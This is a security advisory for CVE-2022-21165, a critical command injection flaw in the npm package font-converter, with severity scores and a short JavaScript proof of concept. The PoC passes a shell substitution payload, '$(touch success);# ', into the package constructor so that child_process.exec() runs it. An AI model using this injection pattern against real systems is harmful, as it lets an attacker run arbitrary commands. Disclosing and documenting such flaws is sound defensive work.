CVE-2022-21165
Font-Converter Vulnerable to Arbitrary Command Injection
9.8
CRITICAL
CVSS 3.1
EPSS 2.6%
Description
### Overview

font-converter is a FontForge wrapper that converts between font formats (TTF, WOFF, OTF). All versions of this package are vulnerable to Arbitrary Command Injection: caller-supplied input flows into `child_process.exec()` without sanitization, so shell metacharacters in that input (for example `$(...)`) are interpreted by the shell that `exec()` spawns.

### PoC

```js
var PUT = require('font-converter');

// Shell command substitution: if this value reaches child_process.exec()
// unsanitized, the shell runs `touch success` and a file named "success"
// appears in the working directory. The trailing "# " comments out
// whatever the wrapper appends after the injected value.
var x = "$(touch success);# ";

try {
  // Every constructor argument receives the payload.
  new PUT(x, x, x, x);
} catch (e) {
  console.log(e);
}
```
How to fix CVE-2022-21165
No fixed version has been published yet. Mitigate by removing the affected package or applying upstream guidance from the references below.
- No fixed version listed
Is CVE-2022-21165 being exploited?
Low. EPSS is 2.6%, i.e. the model estimates roughly a 2.6% probability that this CVE is exploited in the wild within the next 30 days: low, but not zero. No widespread exploitation is reported here.
Affected packages (1)
- font-converter: all versions from 0 up to and including 1.1.1 (no fixed version)
CVSS scores
| Source | Version | Severity | Vector |
|---|---|---|---|
| osv | CVSS 3.1 | CRITICAL (9.8) | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |